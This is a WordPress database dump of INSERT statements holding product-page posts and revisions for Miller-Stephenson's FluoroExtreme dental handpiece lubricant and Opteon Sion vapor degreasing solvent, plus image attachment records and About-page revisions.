INSERT INTO `wp_posts` VALUES (1128, 2, '2016-08-31 16:52:13', '2016-08-31 16:52:13', '<h3><span style="font-size: 120%;"><strong>Dental Handpiece Lubricant</strong></span></h3>\r\nFew medical applications challenge a bearing lubricant more than high-<wbr />speed dental handpieces.  Rotating at speeds of excess of 500,000 rotations per minute (RPM), these handpieces require advanced lubrication which can not only maintain excellent thin-<wbr />film strength, but also do not degrade under the immense mechanical and thermal stresses which occur within these handpieces turbines. FluoroExtreme is the perfect match for your dental handpiece lubricant.\r\n\r\nPictured above is a head-<wbr />to-<wbr />head evaluation of a popular handpiece lubricant versus Miller-<wbr />Stephenson’s FluoroExtreme™ . The handpieces were cleaned and lubricated, then challenged with 3 hours of continuous use at the recommended operating air pressure / rpm. The handpieces were then disassembled and evaluated for wear and deposit formation. The Industry Standard lubricant suffered from significant breakdown resulting in degradation of the o-<wbr />rings, wore impellers and the lubricant itself, resulting in large deposit formation and a very noticeable increase in audible noise during operation.\r\n\r\nIn contrary, <strong>FluoroExtreme™</strong>  developed no deposits, the o-<wbr />rings remained intact, and the impellers exhibited minimal wear.  The handpiece also had no noticeable increase in turbine noise. The data clearly shows that Miller-<wbr />Stephenson’s FluoroExtreme™, delivers substantially improved operation of your dental handpiece. Our lubricant minimizes the unsightly degradation seen with hydrocarbon-<wbr />based lubricants while maintaining quiet and clean operation.  Something both the operator and patient will value.\r\n<h3><strong>Product Description</strong></h3>\r\nFluoroExtreme™ is a fluorinated synthetic lubricant specially designed for dental handpieces. This lubricant offers superior protection, lubricity, and chemical stability versus standard hydrocarbon based dental lubricants. FluoroExtreme™ minimizes mechanical wear in all low and high speed handpieces, allowing devices to run longer and quieter while reducing costly repair intervals.\r\n<p class="Body"><strong><span class="C-13">Benefits and Characteristics</span></strong></p>\r\n\r\n<ul>\r\n 	<li class="Body P-5"><span class="C-8">Minimizes mechanical wear</span></li>\r\n 	<li class="Body P-5"><span class="C-8">Reduction in debris formation; Quieter operation</span></li>\r\n 	<li class="Body P-5"><span class="C-8">Extends service life of critical components</span></li>\r\n 	<li class="Body P-5"><span class="C-8">Non-<wbr />Flammable; Chemical and Thermal stability</span></li>\r\n 	<li class="Body P-5"><span class="C-8">Biocompatible (<a href="https://en.wikipedia.org/wiki/ISO_10993">ISO 10993</a>)</span></li>\r\n</ul>\r\n[ux_product_categories ids="12" number="10"]\r\n\r\n&nbsp;', 'Dental Handpiece Lubricant', '', 'publish', 'closed', 'closed', '', 'dental-handpiece-lubricant', '', '', '2017-03-15 19:14:30', '2017-03-15 19:14:30', '', 0, 'https://132.148.10.86/wordpress/?p=1128', 0, 'post', '', 0); 
INSERT INTO `wp_posts` VALUES (1129, 2, '2016-08-31 16:52:13', '2016-08-31 16:52:13', 'Few medical applications challenge a bearing lubricant more than  high-<wbr />speed dental handpieces.  Rotating at speeds of excess of 500,000 rpm, these handpieces require advanced lubrication which can not only maintain excellent thin-<wbr />film strength, but also do not degrade under the immense mechanical and thermal stresses which occur within these handpieces turbines.\r\n\r\nPictured to the right is a head-<wbr />to-<wbr />head evaluation of a popular handpiece lubricant versus Miller-<wbr />Stephenson’s FluoroExtreme™ . The handpieces were cleaned and lubricated, then challenged with 3 hours of continuous use at the recommended operating air pressure / rpm. The handpieces were then disassembled and evaluated for wear and deposit formation. The Industry Standard lubricant suffered from catastrophic breakdown resulting in degradation of the o-<wbr />rings, wore impellers and the lubricant itself resulting in large deposit formation and a very noticeable increase in audible noise during operation.\r\n\r\nIn contrary, FluoroExtreme™  developed no deposits, the o-<wbr />rings remained intact, and the impellers exhibited minimal wear.  The handpiece also had no noticeable increase in turbine noise.\r\nThe data clearly shows that Miller-<wbr />Stephenson’s FluoroExtreme™, utilizing our proprietary fluorinated synthetic lubricant delivers substantially improved operation of your dental handpiece. Our lubricant minimizes the unsightly degradation seen with hydrocarbon-<wbr />based lubricants while maintaining quiet and clean operation.  Something both the operator and patient will value.\r\n\r\n<strong>Product Description</strong>\r\n\r\nFluoroExtreme™ is a fluorinated synthetic lubricant specially designed for dental handpieces. This lubricant offers superior protection, lubricity, and chemical stability versus standard hydrocarbon based dental lubricants. FluoroExtreme™ minimizes mechanical wear in all low and high speed handpieces, allowing devices to run longer and quieter  while reducing costly repair intervals.\r\n<p class="Body"><strong><span class="C-13">Benefits and Characteristics</span></strong></p>\r\n\r\n<ul>\r\n 	<li class="Body P-5"><span class="C-8">Minimizes mechanical wear</span></li>\r\n 	<li class="Body P-5"><span class="C-8">Reduction in debris formation; Quieter operation</span></li>\r\n 	<li class="Body P-5"><span class="C-8">Extends service life of critical components</span></li>\r\n 	<li class="Body P-5"><span class="C-8">Non-<wbr />Flammable; Chemical and Thermal stability</span></li>\r\n 	<li class="Body P-5"><span class="C-8">Biocompatible (ISO 10993)</span></li>\r\n</ul>', 'Dental Handpiece Lubricant', '', 'inherit', 'closed', 'closed', '', '1128-revision-v1', '', '', '2016-08-31 16:52:13', '2016-08-31 16:52:13', '', 1128, 'https://132.148.10.86/wordpress/1128-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (1131, 2, '2016-08-31 16:55:07', '2016-08-31 16:55:07', 'Few medical applications challenge a bearing lubricant more than  high-<wbr />speed dental handpieces.  Rotating at speeds of excess of 500,000 rpm, these handpieces require advanced lubrication which can not only maintain excellent thin-<wbr />film strength, but also do not degrade under the immense mechanical and thermal stresses which occur within these handpieces turbines.\r\n\r\nPictured up top is a head-<wbr />to-<wbr />head evaluation of a popular handpiece lubricant versus Miller-<wbr />Stephenson’s FluoroExtreme™ . The handpieces were cleaned and lubricated, then challenged with 3 hours of continuous use at the recommended operating air pressure / rpm. The handpieces were then disassembled and evaluated for wear and deposit formation. The Industry Standard lubricant suffered from catastrophic breakdown resulting in degradation of the o-<wbr />rings, wore impellers and the lubricant itself resulting in large deposit formation and a very noticeable increase in audible noise during operation.\r\n\r\nIn contrary, FluoroExtreme™  developed no deposits, the o-<wbr />rings remained intact, and the impellers exhibited minimal wear.  The handpiece also had no noticeable increase in turbine noise.\r\nThe data clearly shows that Miller-<wbr />Stephenson’s FluoroExtreme™, utilizing our proprietary fluorinated synthetic lubricant delivers substantially improved operation of your dental handpiece. Our lubricant minimizes the unsightly degradation seen with hydrocarbon-<wbr />based lubricants while maintaining quiet and clean operation.  Something both the operator and patient will value.\r\n\r\n<strong>Product Description</strong>\r\n\r\nFluoroExtreme™ is a fluorinated synthetic lubricant specially designed for dental handpieces. This lubricant offers superior protection, lubricity, and chemical stability versus standard hydrocarbon based dental lubricants. FluoroExtreme™ minimizes mechanical wear in all low and high speed handpieces, allowing devices to run longer and quieter  while reducing costly repair intervals.\r\n<p class="Body"><strong><span class="C-13">Benefits and Characteristics</span></strong></p>\r\n\r\n<ul>\r\n 	<li class="Body P-5"><span class="C-8">Minimizes mechanical wear</span></li>\r\n 	<li class="Body P-5"><span class="C-8">Reduction in debris formation; Quieter operation</span></li>\r\n 	<li class="Body P-5"><span class="C-8">Extends service life of critical components</span></li>\r\n 	<li class="Body P-5"><span class="C-8">Non-<wbr />Flammable; Chemical and Thermal stability</span></li>\r\n 	<li class="Body P-5"><span class="C-8">Biocompatible (ISO 10993)</span></li>\r\n</ul>', 'Dental Handpiece Lubricant', '', 'inherit', 'closed', 'closed', '', '1128-revision-v1', '', '', '2016-08-31 16:55:07', '2016-08-31 16:55:07', '', 1128, 'https://132.148.10.86/wordpress/1128-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (1132, 2, '2016-08-31 16:57:05', '2016-08-31 16:57:05', '', 'Dental Handpiece Lubricant', '', 'inherit', 'open', 'closed', '', 'fluoroextreme-dental', '', '', '2016-11-24 03:09:16', '2016-11-24 03:09:16', '', 1128, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/08/fluoroextreme-dental.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (1133, 2, '2016-08-31 16:57:13', '2016-08-31 16:57:13', 'Few medical applications challenge a bearing lubricant more than  high-<wbr />speed dental handpieces.  Rotating at speeds of excess of 500,000 rpm, these handpieces require advanced lubrication which can not only maintain excellent thin-<wbr />film strength, but also do not degrade under the immense mechanical and thermal stresses which occur within these handpieces turbines.\r\n\r\nPictured to the right is a head-<wbr />to-<wbr />head evaluation of a popular handpiece lubricant versus Miller-<wbr />Stephenson’s FluoroExtreme™ . The handpieces were cleaned and lubricated, then challenged with 3 hours of continuous use at the recommended operating air pressure / rpm. The handpieces were then disassembled and evaluated for wear and deposit formation. The Industry Standard lubricant suffered from catastrophic breakdown resulting in degradation of the o-<wbr />rings, wore impellers and the lubricant itself resulting in large deposit formation and a very noticeable increase in audible noise during operation.\r\n\r\nIn contrary, FluoroExtreme™  developed no deposits, the o-<wbr />rings remained intact, and the impellers exhibited minimal wear.  The handpiece also had no noticeable increase in turbine noise.\r\nThe data clearly shows that Miller-<wbr />Stephenson’s FluoroExtreme™, utilizing our proprietary fluorinated synthetic lubricant delivers substantially improved operation of your dental handpiece. Our lubricant minimizes the unsightly degradation seen with hydrocarbon-<wbr />based lubricants while maintaining quiet and clean operation.  Something both the operator and patient will value.\r\n\r\n<strong>Product Description</strong>\r\n\r\nFluoroExtreme™ is a fluorinated synthetic lubricant specially designed for dental handpieces. This lubricant offers superior protection, lubricity, and chemical stability versus standard hydrocarbon based dental lubricants. FluoroExtreme™ minimizes mechanical wear in all low and high speed handpieces, allowing devices to run longer and quieter  while reducing costly repair intervals.\r\n<p class="Body"><strong><span class="C-13">Benefits and Characteristics</span></strong></p>\r\n\r\n<ul>\r\n 	<li class="Body P-5"><span class="C-8">Minimizes mechanical wear</span></li>\r\n 	<li class="Body P-5"><span class="C-8">Reduction in debris formation; Quieter operation</span></li>\r\n 	<li class="Body P-5"><span class="C-8">Extends service life of critical components</span></li>\r\n 	<li class="Body P-5"><span class="C-8">Non-<wbr />Flammable; Chemical and Thermal stability</span></li>\r\n 	<li class="Body P-5"><span class="C-8">Biocompatible (ISO 10993)</span></li>\r\n</ul>', 'Dental Handpiece Lubricant', '', 'inherit', 'closed', 'closed', '', '1128-revision-v1', '', '', '2016-08-31 16:57:13', '2016-08-31 16:57:13', '', 1128, 'https://132.148.10.86/wordpress/1128-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (1134, 2, '2016-08-31 16:58:03', '2016-08-31 16:58:03', 'Few medical applications challenge a bearing lubricant more than  high-<wbr />speed dental handpieces.  Rotating at speeds of excess of 500,000 rpm, these handpieces require advanced lubrication which can not only maintain excellent thin-<wbr />film strength, but also do not degrade under the immense mechanical and thermal stresses which occur within these handpieces turbines.\r\n\r\nPictured up top is a head-<wbr />to-<wbr />head evaluation of a popular handpiece lubricant versus Miller-<wbr />Stephenson’s FluoroExtreme™ . The handpieces were cleaned and lubricated, then challenged with 3 hours of continuous use at the recommended operating air pressure / rpm. The handpieces were then disassembled and evaluated for wear and deposit formation. The Industry Standard lubricant suffered from catastrophic breakdown resulting in degradation of the o-<wbr />rings, wore impellers and the lubricant itself resulting in large deposit formation and a very noticeable increase in audible noise during operation.\r\n\r\nIn contrary, FluoroExtreme™  developed no deposits, the o-<wbr />rings remained intact, and the impellers exhibited minimal wear.  The handpiece also had no noticeable increase in turbine noise.\r\nThe data clearly shows that Miller-<wbr />Stephenson’s FluoroExtreme™, utilizing our proprietary fluorinated synthetic lubricant delivers substantially improved operation of your dental handpiece. Our lubricant minimizes the unsightly degradation seen with hydrocarbon-<wbr />based lubricants while maintaining quiet and clean operation.  Something both the operator and patient will value.\r\n\r\n<strong>Product Description</strong>\r\n\r\nFluoroExtreme™ is a fluorinated synthetic lubricant specially designed for dental handpieces. This lubricant offers superior protection, lubricity, and chemical stability versus standard hydrocarbon based dental lubricants. FluoroExtreme™ minimizes mechanical wear in all low and high speed handpieces, allowing devices to run longer and quieter  while reducing costly repair intervals.\r\n<p class="Body"><strong><span class="C-13">Benefits and Characteristics</span></strong></p>\r\n\r\n<ul>\r\n 	<li class="Body P-5"><span class="C-8">Minimizes mechanical wear</span></li>\r\n 	<li class="Body P-5"><span class="C-8">Reduction in debris formation; Quieter operation</span></li>\r\n 	<li class="Body P-5"><span class="C-8">Extends service life of critical components</span></li>\r\n 	<li class="Body P-5"><span class="C-8">Non-<wbr />Flammable; Chemical and Thermal stability</span></li>\r\n 	<li class="Body P-5"><span class="C-8">Biocompatible (ISO 10993)</span></li>\r\n</ul>', 'Dental Handpiece Lubricant', '', 'inherit', 'closed', 'closed', '', '1128-revision-v1', '', '', '2016-08-31 16:58:03', '2016-08-31 16:58:03', '', 1128, 'https://132.148.10.86/wordpress/1128-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (1135, 2, '2016-08-31 17:30:53', '2016-08-31 17:30:53', '<h1><a href="https://www.miller-stephenson.com/product/sion/">Opteon™ Sion</a> - Vapor Degreasing Solvent</h1>\r\n<h4><strong>What is Vapor Degreasing?</strong></h4>\r\nVapor degreasing is a precision cleaning technique used to dissolve greases and remove soils from metal parts. Over the course of the manufacturing process, parts ranging from ball bearings to printed circuit boards become contaminated. Manufacturers employ vapor degreasing to ensure that performance, quality, reliability, and aesthetics are not impacted by these impurities. Opteon™ Sion Vapor Degreasing Solvent is great for removing soils and greases from metal parts.\r\n<h4><strong>What types of industries use vapor degreasing, and where is it used?</strong></h4>\r\n<ul>\r\n 	<li><strong>Automotive</strong>:  Fuel injection, anti-lock braking systems, compressors, relays, sensors, switches</li>\r\n 	<li><strong>Aerospace:  </strong>Fuel injection, landing gear, oxygen systems, printed circuit boards</li>\r\n 	<li><strong>Medical Devices</strong>: Oxygen systems, eyewear, catheters, surgicaldevices/needles, implants</li>\r\n 	<li><strong>High-End Consumer Goods</strong>:  Watches, jewelry, camera lenses, flat panel displays, optical assemblies</li>\r\n 	<li><strong>Electronics/Semi-Conductors:</strong> Printed circuit boards, electrical contacts, cables, optical fibers, silicon wafer front opening unified pods (FOUPs), and flip chips</li>\r\n</ul>\r\n<h4><strong>What problems do manufacturers face when it comes to vapor degreasing?</strong></h4>\r\nThe biggest challenge facing manufacturers who utilize vapor degreasing is the need for a safe and sustainable solvent. The most commonly used solvent, n-Propyl Bromide (nPB), poses a safety risk to workers upon exposure, and regulations have banned the use of HCFCs like AK-225. Many manufacturers are now looking for solutions that are safe for their employees and the environment, without sacrificing performance.\r\n<h4><strong>What is Opteon Sion Specialty Fluid, and why are manufacturers converting to it?</strong></h4>\r\nOpteon Sion Specialty Fluid is a vapor degreasing solvent that is suitable to replace n-propyl bromide and trichloroethylene across many demanding cleaning applications. Manufacturers are switching to Opteon™ Sion because it provides an excellent combination of environmental, safety, health, and performance profiles that meet the high solvency needs of the industrial cleaning market. Opteon™ Sion is increasingly chosen for vapor decreasing, because of its industry leading solvency power (KB value), as well as its improved safety and environmental properties. Other benefits of Opteon™ Sion include, but are not limited to:\r\n<ul>\r\n 	<li>Fast drying, increasing productivity</li>\r\n 	<li>Compatible with most metals, plastics, and elastomers</li>\r\n 	<li>Nonflammable and low toxicity</li>\r\n 	<li>Zero ozone depletion potential (ODP)</li>\r\n 	<li>Low global warming potential (GWP)</li>\r\n</ul>\r\n<h4><strong>What specific products can Opteon Sion Specialty Fluid replace?</strong></h4>\r\n<ul>\r\n 	<li><a href="https://www.miller-stephenson.com/vertrel-fluids/">n-Propyl Bromide (nPB)</a></li>\r\n 	<li>Trichloroethylene</li>\r\n 	<li>Lenium</li>\r\n 	<li>EnSolv</li>\r\n 	<li>AK-225</li>\r\n 	<li>Novec 72DE</li>\r\n 	<li>Solstice PF</li>\r\n 	<li>TF-113</li>\r\n 	<li>Water</li>\r\n</ul>\r\n[ux_product_categories ids="231" number="10"]\r\n\r\n<a href="https://www.miller-stephenson.com/product/sion/">Click here to learn more about Opteon Sion. </a>\r\n\r\nOpteon™ is  a trademark of The Chemours Company FC, LLC.', 'Opteon™ Sion for Vapor Degreasing', '', 'publish', 'closed', 'closed', '', 'opteon-sion-vapor-degreasing-solvent', '', '', '2016-10-13 17:25:12', '2016-10-13 17:25:12', '', 0, 'https://132.148.10.86/wordpress/?p=1135', 0, 'post', '', 0); 
INSERT INTO `wp_posts` VALUES (1136, 2, '2016-08-31 17:30:53', '2016-08-31 17:30:53', '<strong>What is vapor degreasing?</strong>\r\n\r\nVapor degreasing is a precision cleaning technique used to dissolve greases and remove soils from metal parts. Over the course of the manufacturing process, parts ranging from ball bearings to printed circuit boards become contaminated. Manufacturers employ vapor degreasing to ensure that performance, quality, reliability, and aesthetics are not impacted by these impurities.\r\n\r\n<strong>What types of industries use vapor degreasing, and where is it used?</strong>\r\n<ul>\r\n 	<li>Automotive\r\n<ul>\r\n 	<li>Fuel injection, anti-lock braking systems,\r\ncompressors, relays, sensors, switches</li>\r\n</ul>\r\n</li>\r\n 	<li>Aerospace\r\n<ul>\r\n 	<li>Fuel injection, landing gear, oxygen systems, printed\r\ncircuit boards</li>\r\n</ul>\r\n</li>\r\n 	<li>Medical Devices\r\n<ul>\r\n 	<li>Oxygen systems, eyewear, catheters, surgical\r\ndevices/needles, implants</li>\r\n</ul>\r\n</li>\r\n 	<li>High-End Consumer Goods\r\n<ul>\r\n 	<li>Watches, jewelry, camera lenses, flat panel displays,\r\noptical assemblies</li>\r\n</ul>\r\n</li>\r\n 	<li>Electronics/Semi-Conductors\r\n<ul>\r\n 	<li>Printed circuit boards, electrical contacts, cables,\r\noptical fibers, silicon wafer front opening unified pods\r\n(FOUPs), and flip chips</li>\r\n</ul>\r\n</li>\r\n</ul>\r\n<strong>What problems do manufacturers face when it comes to vapor degreasing?</strong>\r\n\r\nThe biggest challenge facing manufacturers who utilize vapor degreasing is the need for a safe and sustainable solvent. The most commonly used solvent, n-Propyl Bromide (nPB), poses a safety risk to workers upon exposure, and regulations have banned the use of HCFCs like AK-225. Many manufacturers are now looking for solutions that are safe for their employees and the\r\nenvironment, without sacrificing performance.\r\n\r\n<strong>What is Opteon™ Sion Specialty Fluid, and why are manufacturers converting to it?</strong>\r\n\r\nOpteon™ Sion Specialty Fluid is a vapor degreasing solvent that is suitable to replace n-propyl bromide across many demanding cleaning applications. Manufacturers are switching to Opteon™ Sion because it provides an excellent combination of environmental, safety, health, and performance profiles that meet the high solvency needs of the industrial cleaning market. Opteon™ Sion is increasingly chosen for vapor decreasing, because of its industry leading solvency power (KB value), as well as its improved safety and environmental properties. Other benefits of Opteon™ Sion include, but are not limited to:\r\n<ul>\r\n 	<li>Fast drying, increasing productivity</li>\r\n 	<li>Compatible with most metals, plastics, and elastomers</li>\r\n 	<li>Nonflammable and low toxicity</li>\r\n 	<li>Zero ozone depletion potential (ODP)</li>\r\n 	<li>Low global warming potential (GWP)</li>\r\n</ul>\r\n<strong>What specific products can Opteon™ Sion Specialty Fluid replace?</strong>\r\n<ul>\r\n 	<li>n-Propyl Bromide (nPB)</li>\r\n 	<li>Lenium</li>\r\n 	<li>EnSolv</li>\r\n 	<li>AK-225</li>\r\n 	<li>Novec 72DE</li>\r\n 	<li>Solstice PF</li>\r\n 	<li>TF-113</li>\r\n 	<li>Water</li>\r\n</ul>', 'Opteon™ Sion for Vapor Degreasing', '', 'inherit', 'closed', 'closed', '', '1135-revision-v1', '', '', '2016-08-31 17:30:53', '2016-08-31 17:30:53', '', 1135, 'https://132.148.10.86/wordpress/1135-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (1137, 2, '2016-08-31 17:31:30', '2016-08-31 17:31:30', '<strong>What is vapor degreasing?</strong>\r\n\r\nVapor degreasing is a precision cleaning technique used to dissolve greases and remove soils from metal parts. Over the course of the manufacturing process, parts ranging from ball bearings to printed circuit boards become contaminated. Manufacturers employ vapor degreasing to ensure that performance, quality, reliability, and aesthetics are not impacted by these impurities.\r\n\r\n<strong>What types of industries use vapor degreasing, and where is it used?</strong>\r\n<ul>\r\n 	<li>Automotive\r\n<ul>\r\n 	<li>Fuel injection, anti-lock braking systems,\r\ncompressors, relays, sensors, switches</li>\r\n</ul>\r\n</li>\r\n 	<li>Aerospace\r\n<ul>\r\n 	<li>Fuel injection, landing gear, oxygen systems, printed\r\ncircuit boards</li>\r\n</ul>\r\n</li>\r\n 	<li>Medical Devices\r\n<ul>\r\n 	<li>Oxygen systems, eyewear, catheters, surgical\r\ndevices/needles, implants</li>\r\n</ul>\r\n</li>\r\n 	<li>High-End Consumer Goods\r\n<ul>\r\n 	<li>Watches, jewelry, camera lenses, flat panel displays,\r\noptical assemblies</li>\r\n</ul>\r\n</li>\r\n 	<li>Electronics/Semi-Conductors\r\n<ul>\r\n 	<li>Printed circuit boards, electrical contacts, cables,\r\noptical fibers, silicon wafer front opening unified pods\r\n(FOUPs), and flip chips</li>\r\n</ul>\r\n</li>\r\n</ul>\r\n<strong>What problems do manufacturers face when it comes to vapor degreasing?</strong>\r\n\r\nThe biggest challenge facing manufacturers who utilize vapor degreasing is the need for a safe and sustainable solvent. The most commonly used solvent, n-Propyl Bromide (nPB), poses a safety risk to workers upon exposure, and regulations have banned the use of HCFCs like AK-225. Many manufacturers are now looking for solutions that are safe for their employees and the environment, without sacrificing performance.\r\n\r\n<strong>What is Opteon™ Sion Specialty Fluid, and why are manufacturers converting to it?</strong>\r\n\r\nOpteon™ Sion Specialty Fluid is a vapor degreasing solvent that is suitable to replace n-propyl bromide across many demanding cleaning applications. Manufacturers are switching to Opteon™ Sion because it provides an excellent combination of environmental, safety, health, and performance profiles that meet the high solvency needs of the industrial cleaning market. Opteon™ Sion is increasingly chosen for vapor decreasing, because of its industry leading solvency power (KB value), as well as its improved safety and environmental properties. Other benefits of Opteon™ Sion include, but are not limited to:\r\n<ul>\r\n 	<li>Fast drying, increasing productivity</li>\r\n 	<li>Compatible with most metals, plastics, and elastomers</li>\r\n 	<li>Nonflammable and low toxicity</li>\r\n 	<li>Zero ozone depletion potential (ODP)</li>\r\n 	<li>Low global warming potential (GWP)</li>\r\n</ul>\r\n<strong>What specific products can Opteon™ Sion Specialty Fluid replace?</strong>\r\n<ul>\r\n 	<li>n-Propyl Bromide (nPB)</li>\r\n 	<li>Lenium</li>\r\n 	<li>EnSolv</li>\r\n 	<li>AK-225</li>\r\n 	<li>Novec 72DE</li>\r\n 	<li>Solstice PF</li>\r\n 	<li>TF-113</li>\r\n 	<li>Water</li>\r\n</ul>', 'Opteon™ Sion for Vapor Degreasing', '', 'inherit', 'closed', 'closed', '', '1135-revision-v1', '', '', '2016-08-31 17:31:30', '2016-08-31 17:31:30', '', 1135, 'https://132.148.10.86/wordpress/1135-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (1138, 1, '2016-08-31 18:22:31', '2016-08-31 18:22:31', '', 'miller_scene', '', 'inherit', 'open', 'closed', '', 'miller_scene', '', '', '2016-08-31 18:22:31', '2016-08-31 18:22:31', '', 0, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/08/miller_scene.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (1139, 3, '2016-08-31 18:43:42', '2016-08-31 18:43:42', '', 'FINISH LINE', '', 'inherit', 'open', 'closed', '', 'finish-line', '', '', '2016-08-31 18:43:42', '2016-08-31 18:43:42', '', 0, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/08/FINISH-LINE.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (1140, 3, '2016-08-31 18:46:22', '2016-08-31 18:46:22', '', 'KRYTOX bearings', '', 'inherit', 'open', 'closed', '', 'krytox-bearings', '', '', '2016-08-31 18:46:22', '2016-08-31 18:46:22', '', 0, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/08/KRYTOX-bearings.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (1141, 3, '2016-08-31 18:48:46', '2016-08-31 18:48:46', '', 'TRIBOSys', '', 'inherit', 'open', 'closed', '', 'tribosys', '', '', '2016-08-31 18:48:46', '2016-08-31 18:48:46', '', 0, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/08/TRIBOSys.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (1142, 3, '2016-08-31 18:51:01', '2016-08-31 18:51:01', '', 'Finishline', '', 'inherit', 'open', 'closed', '', 'finishline', '', '', '2016-08-31 18:51:01', '2016-08-31 18:51:01', '', 0, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/08/Finishline.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (1143, 3, '2016-08-31 19:33:37', '2016-08-31 19:33:37', '[row]\r\n\r\n[col span="1/1"]\r\n<h3>On The Cutting Edge of the Performance Chemical Market</h3>\r\nMiller-Stephenson Chemical Company specializes in providing the most robust, efficient, and highest performing chemical solutions to all industrial sectors.  Our innovative Research and Development team is in constant pursuit of the most technologically advanced materials to better serve our diverse customer base.  Our new product pipeline is highly agile, constantly adjusting to develop solutions to the most stringent performance requirements.  We strive to understand your unique business and engineering requirements and our dedicated technical team helps you find a solution.  If our current portfolio can not solve your issue we hold the technical, material acquisition, and formulation capacity to develop a specialized solution to meet your needs.\r\n<h3>On The Cutting Edge of the Performance Chemical Market</h3>\r\nMiller-Stephenson Chemical Company specializes in providing the most robust, efficient, and highest performing chemical solutions to all industrial sectors.  Our innovative Research and Development team is in constant pursuit of the most technologically advanced materials to better serve our diverse customer base.  Our new product pipeline is highly agile, constantly adjusting to develop solutions to the most stringent performance requirements.  We strive to understand your unique business and engineering requirements and our dedicated technical team helps you find a solution.  If our current portfolio can not solve your issue we hold the technical, material acquisition, and formulation capacity to develop a specialized solution to meet your needs.\r\n\r\n[ux_image]\r\n\r\n[/col]\r\n\r\n[col span="1/2"]\r\n<h3>Miller-Stephenson Chemical Company, founded in 1955.</h3>\r\nProvides quality chemical products for a wide range of industries worldwide. We are committed to providing customers with superior customer service, delivery and technical support to ensure successful product applications. We maintain four facilities throughout the United States and Canada to ensure prompt service and delivery. Distribution outside North America is handled through authorized distributors. If you have any questions, feel free to contact our Technical Service Department regarding your applications.\r\n\r\n[/col]\r\n\r\n[col span="1/2"]\r\n\r\n[ux_image id="1095" image_size="thumbnail" drop_shadow="1"]\r\n\r\n[/col]\r\n\r\n[/row]\r\n\r\n[row]\r\n\r\n[col span="1/3"]\r\n\r\n[ux_image id="1054"]\r\n\r\n[/col]\r\n\r\n[col span="1/3"]\r\n\r\n[ux_image id="142"]\r\n\r\n[/col]\r\n\r\n[col span="1/3"]\r\n\r\n[ux_image id="87"]\r\n\r\n[/col]\r\n\r\n[/row]', 'About', '', 'inherit', 'closed', 'closed', '', '204-revision-v1', '', '', '2016-08-31 19:33:37', '2016-08-31 19:33:37', '', 204, 'https://132.148.10.86/wordpress/204-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (1144, 3, '2016-08-31 19:39:57', '2016-08-31 19:39:57', '[row]\r\n\r\n[col span="1/2"]\r\n\r\n<strong>On The Cutting Edge of the Performance Chemical Market</strong>\r\n\r\nMiller-Stephenson Chemical Company specializes in providing the most robust, efficient, and highest performing chemical solutions to all industrial sectors.  Our innovative Research and Development team is in constant pursuit of the most technologically advanced materials to better serve our diverse customer base.  Our new product pipeline is highly agile, constantly adjusting to develop solutions to the most stringent performance requirements.  We strive to understand your unique business and engineering requirements and our dedicated technical team helps you find a solution.  If our current portfolio can not solve your issue we hold the technical, material acquisition, and formulation capacity to develop a specialized solution to meet your needs.[ux_image]\r\n\r\n[/col]\r\n\r\n[col span="1/2"]\r\n\r\n[ux_image id="1095" image_size="thumbnail" drop_shadow="1"]\r\n\r\n[/col]\r\n\r\n[col span="1/2"]\r\n<h3>Miller-Stephenson Chemical Company, founded in 1955.</h3>\r\nProvides quality chemical products for a wide range of industries worldwide. We are committed to providing customers with superior customer service, delivery and technical support to ensure successful product applications. We maintain four facilities throughout the United States and Canada to ensure prompt service and delivery. Distribution outside North America is handled through authorized distributors. If you have any questions, feel free to contact our Technical Service Department regarding your applications.\r\n\r\n[/col]\r\n\r\n[/row]\r\n\r\n[row]\r\n\r\n[col span="1/3"]\r\n\r\n[ux_image id="1054"]\r\n\r\n[/col]\r\n\r\n[col span="1/3"]\r\n\r\n[ux_image id="142"]\r\n\r\n[/col]\r\n\r\n[col span="1/3"]\r\n\r\n[ux_image id="87"]\r\n\r\n[/col]\r\n\r\n[/row]', 'About', '', 'inherit', 'closed', 'closed', '', '204-revision-v1', '', '', '2016-08-31 19:39:57', '2016-08-31 19:39:57', '', 204, 'https://132.148.10.86/wordpress/204-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (1145, 3, '2016-08-31 19:40:46', '2016-08-31 19:40:46', '[row]\r\n\r\n[col span="1/2"]\r\n\r\n<strong>On The Cutting Edge of the Performance Chemical Market</strong>\r\n\r\nMiller-Stephenson Chemical Company specializes in providing the most robust, efficient, and highest performing chemical solutions to all industrial sectors.  Our innovative Research and Development team is in constant pursuit of the most technologically advanced materials to better serve our diverse customer base.  Our new product pipeline is highly agile, constantly adjusting to develop solutions to the most stringent performance requirements.  We strive to understand your unique business and engineering requirements and our dedicated technical team helps you find a solution.  If our current portfolio can not solve your issue we hold the technical, material acquisition, and formulation capacity to develop a specialized solution to meet your needs.[ux_image]\r\n\r\n[/col]\r\n\r\n[col span="1/2"]\r\n\r\n[ux_image id="1095" image_size="thumbnail" drop_shadow="1"]\r\n\r\n[/col]\r\n\r\n[col span="1/1"]\r\n<h3>Miller-Stephenson Chemical Company, founded in 1955.</h3>\r\nProvides quality chemical products for a wide range of industries worldwide. We are committed to providing customers with superior customer service, delivery and technical support to ensure successful product applications. We maintain four facilities throughout the United States and 